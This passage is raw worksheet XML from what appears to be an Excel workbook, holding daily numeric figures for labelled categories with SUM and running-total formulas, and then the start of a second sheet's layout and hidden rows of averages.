    <row r="3" spans="1:35">
      <c r="A3" s="57" t="s">
        <v>312</v>
      </c>
      <c r="B3" s="57">
        <v>6341.76</v>
      </c>
      <c r="C3" s="57">
        <v>7109.96</v>
      </c>
      <c r="D3" s="57">
        <v>7893.3</v>
      </c>
      <c r="E3" s="57">
        <v>7743.32</v>
      </c>
      <c r="F3" s="57">
        <v>7536.26</v>
      </c>
      <c r="G3" s="57">
        <v>7125.68</v>
      </c>
      <c r="H3" s="57">
        <v>6884.84</v>
      </c>
      <c r="I3" s="57">
        <v>7543.7</v>
      </c>
      <c r="J3" s="57">
        <v>8548.96</v>
      </c>
      <c r="K3" s="57">
        <v>6479.92</v>
      </c>
      <c r="L3" s="57">
        <v>8270.36</v>
      </c>
      <c r="M3" s="57">
        <v>8007.54</v>
      </c>
      <c r="N3" s="57">
        <v>6224.32</v>
      </c>
      <c r="O3" s="57">
        <v>8084.92</v>
      </c>
      <c r="P3" s="57">
        <v>8082.5</v>
      </c>
      <c r="Q3" s="57">
        <v>7938.75999999999</v>
      </c>
      <c r="R3" s="57">
        <v>7655.68</v>
      </c>
      <c r="S3" s="57">
        <v>8200.78</v>
      </c>
      <c r="T3" s="57">
        <v>8483.14</v>
      </c>
      <c r="U3" s="57">
        <v>7130.38</v>
      </c>
      <c r="V3" s="57">
        <v>6841.34</v>
      </c>
      <c r="W3" s="57">
        <v>7481.17</v>
      </c>
      <c r="X3" s="57">
        <v>7834.52</v>
      </c>
      <c r="Y3" s="57">
        <v>7683.42000000001</v>
      </c>
      <c r="Z3" s="57">
        <v>6832.7</v>
      </c>
      <c r="AA3" s="57">
        <v>6943.88</v>
      </c>
      <c r="AB3" s="57">
        <v>7544.7</v>
      </c>
      <c r="AC3" s="57">
        <v>6773.68</v>
      </c>
      <c r="AD3" s="57">
        <v>8163.3</v>
      </c>
      <c r="AE3" s="57">
        <v>8047.62</v>
      </c>
      <c r="AF3" s="57">
        <v>7369.98</v>
      </c>
      <c r="AG3" s="60">
        <f t="shared" ref="AG3:AG16" si="0">SUM(B3:AF3)</f>
        <v>232802.39</v>
      </c>
      <c r="AH3" s="61">
        <f>AG3+AI3</f>
        <v>2163275.81</v>
      </c>
      <c r="AI3" s="62">
        <v>1930473.42</v>
      </c>
    </row>
    <row r="4" spans="1:35">
      <c r="A4" s="57" t="s">
        <v>370</v>
      </c>
      <c r="B4" s="57">
        <v>478</v>
      </c>
      <c r="C4" s="57">
        <v>437.5</v>
      </c>
      <c r="D4" s="57">
        <v>610</v>
      </c>
      <c r="E4" s="57">
        <v>557.5</v>
      </c>
      <c r="F4" s="57">
        <v>375.5</v>
      </c>
      <c r="G4" s="57">
        <v>611</v>
      </c>
      <c r="H4" s="57">
        <v>739</v>
      </c>
      <c r="I4" s="57">
        <v>454</v>
      </c>
      <c r="J4" s="57">
        <v>522</v>
      </c>
      <c r="K4" s="57">
        <v>407.5</v>
      </c>
      <c r="L4" s="57">
        <v>514.5</v>
      </c>
      <c r="M4" s="57">
        <v>541</v>
      </c>
      <c r="N4" s="57">
        <v>444</v>
      </c>
      <c r="O4" s="57">
        <v>391</v>
      </c>
      <c r="P4" s="57">
        <v>451.5</v>
      </c>
      <c r="Q4" s="57">
        <v>532.5</v>
      </c>
      <c r="R4" s="57">
        <v>532.5</v>
      </c>
      <c r="S4" s="57">
        <v>590.5</v>
      </c>
      <c r="T4" s="57">
        <v>410</v>
      </c>
      <c r="U4" s="57">
        <v>419.5</v>
      </c>
      <c r="V4" s="57">
        <v>392.5</v>
      </c>
      <c r="W4" s="57">
        <v>568</v>
      </c>
      <c r="X4" s="57">
        <v>615.5</v>
      </c>
      <c r="Y4" s="57">
        <v>472.5</v>
      </c>
      <c r="Z4" s="57">
        <v>274.5</v>
      </c>
      <c r="AA4" s="57">
        <v>469.5</v>
      </c>
      <c r="AB4" s="57">
        <v>427.5</v>
      </c>
      <c r="AC4" s="57">
        <v>481.5</v>
      </c>
      <c r="AD4" s="57">
        <v>532.5</v>
      </c>
      <c r="AE4" s="57">
        <v>573.5</v>
      </c>
      <c r="AF4" s="57">
        <v>345</v>
      </c>
      <c r="AG4" s="60">
        <f t="shared" si="0"/>
        <v>15171.5</v>
      </c>
      <c r="AH4" s="61">
        <f t="shared" ref="AH4:AH16" si="1">AG4+AI4</f>
        <v>158023.45</v>
      </c>
      <c r="AI4" s="62">
        <v>142851.95</v>
      </c>
    </row>
    <row r="5" spans="1:35">
      <c r="A5" s="57" t="s">
        <v>349</v>
      </c>
      <c r="B5" s="57">
        <v>3242.83</v>
      </c>
      <c r="C5" s="57">
        <v>3828.63</v>
      </c>
      <c r="D5" s="57">
        <v>3263.62</v>
      </c>
      <c r="E5" s="57">
        <v>3769.19</v>
      </c>
      <c r="F5" s="57">
        <v>4444.91</v>
      </c>
      <c r="G5" s="57">
        <v>3677.33</v>
      </c>
      <c r="H5" s="57">
        <v>3998.86</v>
      </c>
      <c r="I5" s="57">
        <v>4496.14</v>
      </c>
      <c r="J5" s="57">
        <v>4057.67</v>
      </c>
      <c r="K5" s="57">
        <v>4121.75</v>
      </c>
      <c r="L5" s="57">
        <v>4078.29</v>
      </c>
      <c r="M5" s="57">
        <v>3666.13</v>
      </c>
      <c r="N5" s="57">
        <v>4080.07</v>
      </c>
      <c r="O5" s="57">
        <v>4298.56</v>
      </c>
      <c r="P5" s="57">
        <v>3621.82</v>
      </c>
      <c r="Q5" s="57">
        <v>3787.39</v>
      </c>
      <c r="R5" s="57">
        <v>3566.79</v>
      </c>
      <c r="S5" s="57">
        <v>4889.4</v>
      </c>
      <c r="T5" s="57">
        <v>4157.01</v>
      </c>
      <c r="U5" s="57">
        <v>3969.08</v>
      </c>
      <c r="V5" s="57">
        <v>3636.83</v>
      </c>
      <c r="W5" s="57">
        <v>3375.76</v>
      </c>
      <c r="X5" s="57">
        <v>4471.16</v>
      </c>
      <c r="Y5" s="57">
        <v>4799.24</v>
      </c>
      <c r="Z5" s="57">
        <v>3711.5</v>
      </c>
      <c r="AA5" s="57">
        <v>3209.51</v>
      </c>
      <c r="AB5" s="57">
        <v>4459.61</v>
      </c>
      <c r="AC5" s="57">
        <v>4325.66</v>
      </c>
      <c r="AD5" s="57">
        <v>3854.61</v>
      </c>
      <c r="AE5" s="57">
        <v>3680.99</v>
      </c>
      <c r="AF5" s="57">
        <v>3641.66</v>
      </c>
      <c r="AG5" s="60">
        <f t="shared" si="0"/>
        <v>122182</v>
      </c>
      <c r="AH5" s="61">
        <f t="shared" si="1"/>
        <v>1232208.52</v>
      </c>
      <c r="AI5" s="63">
        <v>1110026.52</v>
      </c>
    </row>
    <row r="6" spans="1:35">
      <c r="A6" s="57" t="s">
        <v>348</v>
      </c>
      <c r="B6" s="57">
        <v>419.5</v>
      </c>
      <c r="C6" s="57">
        <v>339</v>
      </c>
      <c r="D6" s="57">
        <v>434.5</v>
      </c>
      <c r="E6" s="57">
        <v>347</v>
      </c>
      <c r="F6" s="57">
        <v>231.5</v>
      </c>
      <c r="G6" s="57">
        <v>465.02</v>
      </c>
      <c r="H6" s="57">
        <v>456.65</v>
      </c>
      <c r="I6" s="57">
        <v>779.75</v>
      </c>
      <c r="J6" s="57">
        <v>809.93</v>
      </c>
      <c r="K6" s="57">
        <v>979.93</v>
      </c>
      <c r="L6" s="57">
        <v>1236.46</v>
      </c>
      <c r="M6" s="57">
        <v>685.95</v>
      </c>
      <c r="N6" s="57">
        <v>1107.72</v>
      </c>
      <c r="O6" s="57">
        <v>1557.37</v>
      </c>
      <c r="P6" s="57">
        <v>1278.92</v>
      </c>
      <c r="Q6" s="57">
        <v>1324.51</v>
      </c>
      <c r="R6" s="57">
        <v>1199.03</v>
      </c>
      <c r="S6" s="57">
        <v>1058.76</v>
      </c>
      <c r="T6" s="57">
        <v>900.79</v>
      </c>
      <c r="U6" s="57">
        <v>1027.19</v>
      </c>
      <c r="V6" s="57">
        <v>878.07</v>
      </c>
      <c r="W6" s="57">
        <v>1306.72</v>
      </c>
      <c r="X6" s="57">
        <v>1010.41</v>
      </c>
      <c r="Y6" s="57">
        <v>1032.1</v>
      </c>
      <c r="Z6" s="57">
        <v>1147.37</v>
      </c>
      <c r="AA6" s="57">
        <v>679.51</v>
      </c>
      <c r="AB6" s="57">
        <v>1101.03</v>
      </c>
      <c r="AC6" s="57">
        <v>787.04</v>
      </c>
      <c r="AD6" s="57">
        <v>867.08</v>
      </c>
      <c r="AE6" s="57">
        <v>764.57</v>
      </c>
      <c r="AF6" s="57">
        <v>1039.67</v>
      </c>
      <c r="AG6" s="60">
        <f t="shared" si="0"/>
        <v>27253.05</v>
      </c>
      <c r="AH6" s="61">
        <f t="shared" si="1"/>
        <v>149541.19</v>
      </c>
      <c r="AI6" s="63">
        <v>122288.14</v>
      </c>
    </row>
    <row r="7" spans="1:35">
      <c r="A7" s="57" t="s">
        <v>321</v>
      </c>
      <c r="B7" s="57"/>
      <c r="C7" s="57"/>
      <c r="D7" s="57"/>
      <c r="E7" s="57"/>
      <c r="F7" s="57"/>
      <c r="G7" s="57"/>
      <c r="H7" s="57"/>
      <c r="I7" s="57"/>
      <c r="J7" s="57"/>
      <c r="K7" s="57"/>
      <c r="L7" s="57"/>
      <c r="M7" s="57"/>
      <c r="N7" s="57"/>
      <c r="O7" s="57"/>
      <c r="P7" s="57"/>
      <c r="Q7" s="57"/>
      <c r="R7" s="57"/>
      <c r="S7" s="57"/>
      <c r="T7" s="57"/>
      <c r="U7" s="57"/>
      <c r="V7" s="57"/>
      <c r="W7" s="57"/>
      <c r="X7" s="57"/>
      <c r="Y7" s="57"/>
      <c r="Z7" s="57"/>
      <c r="AF7" s="57"/>
      <c r="AG7" s="60">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="AH7" s="61">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="AI7" s="54">
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:35">
      <c r="A8" s="57" t="s">
        <v>304</v>
      </c>
      <c r="B8" s="57">
        <v>5187.95</v>
      </c>
      <c r="C8" s="57">
        <v>7392.73</v>
      </c>
      <c r="D8" s="57">
        <v>5285.163</v>
      </c>
      <c r="E8" s="57">
        <v>4624.003</v>
      </c>
      <c r="F8" s="57">
        <v>5301.241</v>
      </c>
      <c r="G8" s="57">
        <v>4559.54</v>
      </c>
      <c r="H8" s="57">
        <v>4811.609</v>
      </c>
      <c r="I8" s="57">
        <v>4099.27</v>
      </c>
      <c r="J8" s="57">
        <v>4832.573</v>
      </c>
      <c r="K8" s="57">
        <v>4958.35</v>
      </c>
      <c r="L8" s="57">
        <v>4658.25</v>
      </c>
      <c r="M8" s="57">
        <v>4949.32</v>
      </c>
      <c r="N8" s="57">
        <v>4654.811</v>
      </c>
      <c r="O8" s="57">
        <v>4006.04</v>
      </c>
      <c r="P8" s="57">
        <v>4942.355</v>
      </c>
      <c r="Q8" s="57">
        <v>4170.01</v>
      </c>
      <c r="R8" s="57">
        <v>5074.126</v>
      </c>
      <c r="S8" s="57">
        <v>5376.891</v>
      </c>
      <c r="T8" s="57">
        <v>5068.027</v>
      </c>
      <c r="U8" s="57">
        <v>4215.51</v>
      </c>
      <c r="V8" s="57">
        <v>5255.6</v>
      </c>
      <c r="W8" s="57">
        <v>3983.64</v>
      </c>
      <c r="X8" s="57">
        <v>4961.536</v>
      </c>
      <c r="Y8" s="57">
        <v>4834.242</v>
      </c>
      <c r="Z8" s="57">
        <v>3424.69</v>
      </c>
      <c r="AA8" s="57">
        <v>4188.9</v>
      </c>
      <c r="AB8" s="57">
        <v>4099.59</v>
      </c>
      <c r="AC8" s="57">
        <v>5115.387</v>
      </c>
      <c r="AD8" s="57">
        <v>4896.94</v>
      </c>
      <c r="AE8" s="57">
        <v>5631.488</v>
      </c>
      <c r="AF8" s="57">
        <v>4405.233</v>
      </c>
      <c r="AG8" s="60">
        <f t="shared" si="0"/>
        <v>148965.015</v>
      </c>
      <c r="AH8" s="61">
        <f t="shared" si="1"/>
        <v>1520142.101</v>
      </c>
      <c r="AI8" s="63">
        <v>1371177.086</v>
      </c>
    </row>
    <row r="9" spans="1:35">
      <c r="A9" s="57" t="s">
        <v>352</v>
      </c>
      <c r="B9" s="57">
        <v>6233.6</v>
      </c>
      <c r="C9" s="57">
        <v>4629.18</v>
      </c>
      <c r="D9" s="57">
        <v>3666.18</v>
      </c>
      <c r="E9" s="57">
        <v>3876.14</v>
      </c>
      <c r="F9" s="57">
        <v>5551.13</v>
      </c>
      <c r="G9" s="57">
        <v>5664.53</v>
      </c>
      <c r="H9" s="57">
        <v>6130.55</v>
      </c>
      <c r="I9" s="57">
        <v>4464.9</v>
      </c>
      <c r="J9" s="57">
        <v>5091.31</v>
      </c>
      <c r="K9" s="57">
        <v>4105.17</v>
      </c>
      <c r="L9" s="57">
        <v>4739.2</v>
      </c>
      <c r="M9" s="57">
        <v>3674.81</v>
      </c>
      <c r="N9" s="57">
        <v>5008.93</v>
      </c>
      <c r="O9" s="57">
        <v>3712.38</v>
      </c>
      <c r="P9" s="57">
        <v>4330.18</v>
      </c>
      <c r="Q9" s="57">
        <v>4988.92</v>
      </c>
      <c r="R9" s="57">
        <v>5309.31</v>
      </c>
      <c r="S9" s="57">
        <v>5504.13</v>
      </c>
      <c r="T9" s="57">
        <v>4892.74</v>
      </c>
      <c r="U9" s="57">
        <v>4704.27</v>
      </c>
      <c r="V9" s="57">
        <v>4133.9</v>
      </c>
      <c r="W9" s="57">
        <v>5158.44</v>
      </c>
      <c r="X9" s="57">
        <v>5565.93</v>
      </c>
      <c r="Y9" s="57">
        <v>5751.1</v>
      </c>
      <c r="Z9" s="57">
        <v>6263.74</v>
      </c>
      <c r="AA9" s="57">
        <v>4726.47</v>
      </c>
      <c r="AB9" s="57">
        <v>5447.13</v>
      </c>
      <c r="AC9" s="57">
        <v>6047.37</v>
      </c>
      <c r="AD9" s="57">
        <v>4773.25</v>
      </c>
      <c r="AE9" s="57">
        <v>4367.28</v>
      </c>
      <c r="AF9" s="57">
        <v>5010.97</v>
      </c>
      <c r="AG9" s="60">
        <f t="shared" si="0"/>
        <v>153523.14</v>
      </c>
      <c r="AH9" s="61">
        <f t="shared" si="1"/>
        <v>1520294.32</v>
      </c>
      <c r="AI9" s="63">
        <v>1366771.18</v>
      </c>
    </row>
    <row r="10" ht="12.75" spans="1:35">
      <c r="A10" s="64" t="s">
        <v>371</v>
      </c>
      <c r="B10" s="57">
        <v>21903.64</v>
      </c>
      <c r="C10" s="57">
        <v>23737</v>
      </c>
      <c r="D10" s="57">
        <v>21152.763</v>
      </c>
      <c r="E10" s="57">
        <v>20917.153</v>
      </c>
      <c r="F10" s="57">
        <v>23440.541</v>
      </c>
      <c r="G10" s="57">
        <v>22103.1</v>
      </c>
      <c r="H10" s="57">
        <v>23021.509</v>
      </c>
      <c r="I10" s="57">
        <v>21837.76</v>
      </c>
      <c r="J10" s="57">
        <v>23862.443</v>
      </c>
      <c r="K10" s="57">
        <v>21052.62</v>
      </c>
      <c r="L10" s="57">
        <v>23497.06</v>
      </c>
      <c r="M10" s="57">
        <v>21524.75</v>
      </c>
      <c r="N10" s="57">
        <v>21519.851</v>
      </c>
      <c r="O10" s="57">
        <v>22050.27</v>
      </c>
      <c r="P10" s="57">
        <v>22707.275</v>
      </c>
      <c r="Q10" s="57">
        <v>22742.09</v>
      </c>
      <c r="R10" s="57">
        <v>23337.436</v>
      </c>
      <c r="S10" s="57">
        <v>25620.461</v>
      </c>
      <c r="T10" s="57">
        <v>23911.707</v>
      </c>
      <c r="U10" s="57">
        <v>21465.93</v>
      </c>
      <c r="V10" s="57">
        <v>21138.24</v>
      </c>
      <c r="W10" s="57">
        <v>21873.73</v>
      </c>
      <c r="X10" s="57">
        <v>24459.056</v>
      </c>
      <c r="Y10" s="57">
        <v>24572.602</v>
      </c>
      <c r="Z10" s="57">
        <v>21654.5</v>
      </c>
      <c r="AA10" s="57">
        <v>20217.77</v>
      </c>
      <c r="AB10" s="57">
        <v>23079.56</v>
      </c>
      <c r="AC10" s="57">
        <v>23530.637</v>
      </c>
      <c r="AD10" s="57">
        <v>23087.68</v>
      </c>
      <c r="AE10" s="57">
        <v>23065.448</v>
      </c>
      <c r="AF10" s="57">
        <v>21812.513</v>
      </c>
      <c r="AG10" s="60">
        <f t="shared" si="0"/>
        <v>699897.095</v>
      </c>
      <c r="AH10" s="61">
        <f t="shared" si="1"/>
        <v>6743485.391</v>
      </c>
      <c r="AI10" s="63">
        <v>6043588.296</v>
      </c>
    </row>
    <row r="11" spans="1:35">
      <c r="A11" s="65" t="s">
        <v>372</v>
      </c>
      <c r="B11" s="57">
        <v>473.78</v>
      </c>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60">
        <f t="shared" si="0"/>
        <v>473.78</v>
      </c>
      <c r="AH11" s="61">
        <f t="shared" si="1"/>
        <v>79794.63</v>
      </c>
      <c r="AI11" s="66">
        <v>79320.85</v>
      </c>
    </row>
    <row r="12" ht="12.75" spans="1:35">
      <c r="A12" s="67" t="s">
        <v>373</v>
      </c>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60">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="AH12" s="61">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="AI12" s="62">
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="12.75" spans="1:35">
      <c r="A13" s="67" t="s">
        <v>374</v>
      </c>
      <c r="B13" s="57"/>
      <c r="C13" s="57"/>
      <c r="D13" s="68"/>
      <c r="E13" s="57"/>
      <c r="F13" s="57"/>
      <c r="G13" s="57"/>
      <c r="H13" s="57"/>
      <c r="I13" s="57"/>
      <c r="J13" s="68"/>
      <c r="K13" s="68"/>
      <c r="L13" s="57"/>
      <c r="M13" s="57"/>
      <c r="N13" s="57"/>
      <c r="O13" s="57"/>
      <c r="P13" s="57"/>
      <c r="Q13" s="57"/>
      <c r="R13" s="57"/>
      <c r="S13" s="68"/>
      <c r="T13" s="57"/>
      <c r="U13" s="57"/>
      <c r="V13" s="57"/>
      <c r="W13" s="57"/>
      <c r="X13" s="57"/>
      <c r="Y13" s="57"/>
      <c r="Z13" s="57"/>
      <c r="AA13" s="68"/>
      <c r="AB13" s="68"/>
      <c r="AC13" s="68"/>
      <c r="AD13" s="68"/>
      <c r="AE13" s="68"/>
      <c r="AF13" s="68"/>
      <c r="AG13" s="60">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="AH13" s="61">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="AI13" s="63">
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:35">
      <c r="A14" s="67" t="s">
        <v>375</v>
      </c>
      <c r="B14" s="68"/>
      <c r="C14" s="68"/>
      <c r="D14" s="57"/>
      <c r="E14" s="68">
        <v>581.555</v>
      </c>
      <c r="F14" s="57">
        <v>646.761</v>
      </c>
      <c r="G14" s="68"/>
      <c r="H14" s="68"/>
      <c r="I14" s="68">
        <v>112.75</v>
      </c>
      <c r="J14" s="57">
        <v>148.95</v>
      </c>
      <c r="K14" s="57">
        <v>157.88</v>
      </c>
      <c r="L14" s="68">
        <v>149.6</v>
      </c>
      <c r="M14" s="68">
        <v>1054.713</v>
      </c>
      <c r="N14" s="68">
        <v>1045.924</v>
      </c>
      <c r="O14" s="68">
        <v>248.72</v>
      </c>
      <c r="P14" s="68">
        <v>127.145</v>
      </c>
      <c r="Q14" s="68">
        <v>247.38</v>
      </c>
      <c r="R14" s="68">
        <v>64.311</v>
      </c>
      <c r="S14" s="57">
        <v>446.574</v>
      </c>
      <c r="T14" s="68">
        <v>510.652</v>
      </c>
      <c r="U14" s="68">
        <v>195.895</v>
      </c>
      <c r="V14" s="68"/>
      <c r="W14" s="68">
        <v>196.47</v>
      </c>
      <c r="X14" s="68">
        <v>896.315</v>
      </c>
      <c r="Y14" s="68">
        <v>246.33</v>
      </c>
      <c r="Z14" s="68"/>
      <c r="AA14" s="57"/>
      <c r="AB14" s="57">
        <v>1232.713</v>
      </c>
      <c r="AC14" s="57">
        <v>90.75</v>
      </c>
      <c r="AD14" s="57">
        <v>136.78</v>
      </c>
      <c r="AE14" s="57">
        <v>519.804</v>
      </c>
      <c r="AF14" s="57">
        <v>136.77</v>
      </c>
      <c r="AG14" s="60">
        <f t="shared" si="0"/>
        <v>9194.742</v>
      </c>
      <c r="AH14" s="61">
        <f t="shared" si="1"/>
        <v>44694.949</v>
      </c>
      <c r="AI14" s="63">
        <v>35500.207</v>
      </c>
    </row>
    <row r="15" spans="1:35">
      <c r="A15" s="67" t="s">
        <v>376</v>
      </c>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60">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="AH15" s="61">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="AI15" s="63">
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="12.75" spans="1:35">
      <c r="A16" s="69" t="s">
        <v>377</v>
      </c>
      <c r="B16" s="57">
        <v>473.78</v>
      </c>
      <c r="C16" s="57">
        <v>0</v>
      </c>
      <c r="D16" s="57">
        <v>0</v>
      </c>
      <c r="E16" s="57">
        <v>581.555</v>
      </c>
      <c r="F16" s="57">
        <v>646.761</v>
      </c>
      <c r="G16" s="57">
        <v>0</v>
      </c>
      <c r="H16" s="57">
        <v>0</v>
      </c>
      <c r="I16" s="57">
        <v>112.75</v>
      </c>
      <c r="J16" s="57">
        <v>148.95</v>
      </c>
      <c r="K16" s="57">
        <v>157.88</v>
      </c>
      <c r="L16" s="57">
        <v>149.6</v>
      </c>
      <c r="M16" s="57">
        <v>1054.713</v>
      </c>
      <c r="N16" s="57">
        <v>1045.924</v>
      </c>
      <c r="O16" s="57">
        <v>248.72</v>
      </c>
      <c r="P16" s="57">
        <v>127.145</v>
      </c>
      <c r="Q16" s="57">
        <v>247.38</v>
      </c>
      <c r="R16" s="57">
        <v>64.311</v>
      </c>
      <c r="S16" s="57">
        <v>446.574</v>
      </c>
      <c r="T16" s="57">
        <v>510.652</v>
      </c>
      <c r="U16" s="57">
        <v>195.895</v>
      </c>
      <c r="V16" s="57">
        <v>0</v>
      </c>
      <c r="W16" s="57">
        <v>196.47</v>
      </c>
      <c r="X16" s="57">
        <v>896.315</v>
      </c>
      <c r="Y16" s="57">
        <v>246.33</v>
      </c>
      <c r="Z16" s="57">
        <v>0</v>
      </c>
      <c r="AA16" s="57">
        <v>0</v>
      </c>
      <c r="AB16" s="57">
        <v>1232.713</v>
      </c>
      <c r="AC16" s="57">
        <v>90.75</v>
      </c>
      <c r="AD16" s="57">
        <v>136.78</v>
      </c>
      <c r="AE16" s="57">
        <v>519.804</v>
      </c>
      <c r="AF16" s="57">
        <v>136.77</v>
      </c>
      <c r="AG16" s="60">
        <f t="shared" si="0"/>
        <v>9668.522</v>
      </c>
      <c r="AH16" s="61">
        <f t="shared" si="1"/>
        <v>124489.419</v>
      </c>
      <c r="AI16" s="63">
        <v>114820.897</v>
      </c>
    </row>
    <row r="19" spans="2:28">
      <c r="B19" s="70"/>
      <c r="C19" s="70"/>
      <c r="D19" s="70"/>
      <c r="E19" s="70"/>
      <c r="F19" s="70"/>
      <c r="G19" s="70"/>
      <c r="H19" s="70"/>
      <c r="I19" s="70"/>
      <c r="N19" s="70"/>
      <c r="O19" s="70"/>
      <c r="P19" s="70"/>
      <c r="Q19" s="70"/>
      <c r="R19" s="70"/>
      <c r="W19" s="70"/>
      <c r="X19" s="70"/>
      <c r="Y19" s="70"/>
      <c r="Z19" s="70"/>
      <c r="AA19" s="70"/>
      <c r="AB19" s="70"/>
    </row>
  </sheetData>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tabColor rgb="FFFFC000"/>
  </sheetPr>
  <dimension ref="C2:V60"/>
  <sheetViews>
    <sheetView zoomScale="75" zoomScaleNormal="75" workbookViewId="0">
      <selection activeCell="A1" sqref="$A1:$XFD1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.375" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="4" width="10.375" style="13"/>
    <col min="5" max="13" width="9.625" style="13" customWidth="1"/>
    <col min="14" max="14" width="10.375" style="13" customWidth="1"/>
    <col min="15" max="15" width="0.125" style="13" hidden="1" customWidth="1"/>
    <col min="16" max="17" width="10.375" style="13"/>
    <col min="18" max="18" width="10.75" style="13" customWidth="1"/>
    <col min="19" max="16384" width="10.375" style="13"/>
  </cols>
  <sheetData>
    <row r="2" ht="18" customHeight="1" spans="3:18">
      <c r="C2" s="14" t="s">
        <v>378</v>
      </c>
      <c r="D2" s="14"/>
      <c r="E2" s="14"/>
      <c r="F2" s="14"/>
      <c r="G2" s="14"/>
      <c r="H2" s="14"/>
      <c r="I2" s="14"/>
      <c r="J2" s="14"/>
      <c r="K2" s="14"/>
      <c r="L2" s="14"/>
      <c r="M2" s="14"/>
      <c r="N2" s="14"/>
      <c r="O2" s="14"/>
      <c r="P2" s="14"/>
      <c r="Q2" s="14"/>
    </row>
    <row r="3" spans="3:18">
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>337</v>
      </c>
      <c r="G3" s="15">
        <v>12</v>
      </c>
      <c r="H3" s="16" t="s">
        <v>224</v>
      </c>
      <c r="I3" s="16"/>
      <c r="J3" s="16"/>
      <c r="K3" s="16"/>
      <c r="L3" s="16"/>
      <c r="M3" s="16"/>
      <c r="N3" s="15">
        <v>31</v>
      </c>
      <c r="O3" s="16" t="s">
        <v>223</v>
      </c>
      <c r="P3" s="1" t="s">
        <v>223</v>
      </c>
      <c r="Q3" s="16"/>
    </row>
    <row r="4" ht="36" customHeight="1" spans="3:18">
      <c r="C4" s="17" t="s">
        <v>211</v>
      </c>
      <c r="D4" s="18" t="s">
        <v>379</v>
      </c>
      <c r="E4" s="18" t="s">
        <v>380</v>
      </c>
      <c r="F4" s="18" t="s">
        <v>381</v>
      </c>
      <c r="G4" s="18" t="s">
        <v>382</v>
      </c>
      <c r="H4" s="18" t="s">
        <v>383</v>
      </c>
      <c r="I4" s="18" t="s">
        <v>384</v>
      </c>
      <c r="J4" s="18" t="s">
        <v>385</v>
      </c>
      <c r="K4" s="18" t="s">
        <v>386</v>
      </c>
      <c r="L4" s="19" t="s">
        <v>387</v>
      </c>
      <c r="M4" s="19" t="s">
        <v>388</v>
      </c>
      <c r="N4" s="18" t="s">
        <v>389</v>
      </c>
      <c r="O4" s="19" t="s">
        <v>390</v>
      </c>
      <c r="P4" s="18" t="s">
        <v>367</v>
      </c>
      <c r="Q4" s="19" t="s">
        <v>368</v>
      </c>
      <c r="R4" s="20" t="s">
        <v>391</v>
      </c>
    </row>
    <row r="5" ht="12" hidden="1" customHeight="1" spans="3:18">
      <c r="C5" s="21" t="s">
        <v>392</v>
      </c>
      <c r="D5" s="22" t="s">
        <v>352</v>
      </c>
      <c r="E5" s="23">
        <v>730.440833333333</v>
      </c>
      <c r="F5" s="23"/>
      <c r="G5" s="23"/>
      <c r="H5" s="23"/>
      <c r="I5" s="23"/>
      <c r="J5" s="23"/>
      <c r="K5" s="23"/>
      <c r="L5" s="23"/>
      <c r="M5" s="23"/>
      <c r="N5" s="24"/>
      <c r="O5" s="24"/>
      <c r="P5" s="24"/>
      <c r="Q5" s="24"/>
      <c r="R5" s="22"/>
    </row>
    <row r="6" hidden="1" spans="3:18">
      <c r="C6" s="21"/>
      <c r="D6" s="22" t="s">
        <v>312</v>
      </c>
      <c r="E6" s="23">
        <v>708.780833333333</v>
      </c>
      <c r="F6" s="23"/>
      <c r="G6" s="23"/>
      <c r="H6" s="23"/>
      <c r="I6" s="23"/>
      <c r="J6" s="23"/>
      <c r="K6" s="23"/>
      <c r="L6" s="23"/>
      <c r="M6" s="23"/>
      <c r="N6" s="24"/>
      <c r="O6" s="24"/>
      <c r="P6" s="24"/>
      <c r="Q6" s="24"/>
      <c r="R6" s="22"/>
    </row>
    <row r="7" hidden="1" spans="3:18">
      <c r="C7" s="21"/>
      <c r="D7" s="22" t="s">
        <v>393</v>
      </c>
      <c r="E7" s="23">
        <v>616.17</v>
      </c>
      <c r="F7" s="23"/>
      <c r="G7" s="23"/>
      <c r="H7" s="23"/>
      <c r="I7" s="23"/>
      <c r="J7" s="23"/>
      <c r="K7" s="23"/>
      <c r="L7" s="23"/>
      <c r="M7" s="23"/>
      <c r="N7" s="24"/>
      <c r="O7" s="24"/>
      <c r="P7" s="24"/>
      <c r="Q7" s="24"/>
      <c r="R7" s="22"/>
    </row>
    <row r="8" hidden="1" spans="3:18">
      <c r="C8" s="21"/>
      <c r="D8" s="22" t="s">
        <v>394</v>
      </c>
      <c r="E8" s="23">
        <v>762.302230591763</v>
      </c>
      <c r="F8" s="23"/>
      <c r="G8" s="23"/>
      <c r="H8" s="23"/>
      <c r="I8" s="23"/>
      <c r="J8" s="23"/>
      <c r="K8" s="23"/>
      <c r="L8" s="23"/>
      <c r="M8" s="23"/>
      <c r="N8" s="24"/>
      <c r="O8" s="24"/>
      <c r="P8" s="24"/>
      <c r="Q8" s="24"/>
      <c r="R8" s="22"/>
    </row>
    <row r="9" hidden="1" spans="3:18">
      <c r="C9" s="21"/>
      <c r="D9" s="22" t="s">
        <v>348</v>
      </c>
      <c r="E9" s="25">
        <v>594.933855215906</v>
      </c>
      <c r="F9" s="25"/>
      <c r="G9" s="25"/>
      <c r="H9" s="25"/>
      <c r="I9" s="25"/>
      <c r="J9" s="25"/>
      <c r="K9" s="25"/>
      <c r="L9" s="25"/>
      <c r="M9" s="25"/>
      <c r="N9" s="22"/>
      <c r="O9" s="22"/>
      <c r="P9" s="22"/>
      <c r="Q9" s="22"/>
      <c r="R9" s="22"/>
    </row>
    <row r="10" ht="12" hidden="1" customHeight="1" spans="3:18">
      <c r="C10" s="21" t="s">
        <v>395</v>
      </c>
      <c r="D10" s="22" t="s">
        <v>352</v>
      </c>
      <c r="E10" s="25">
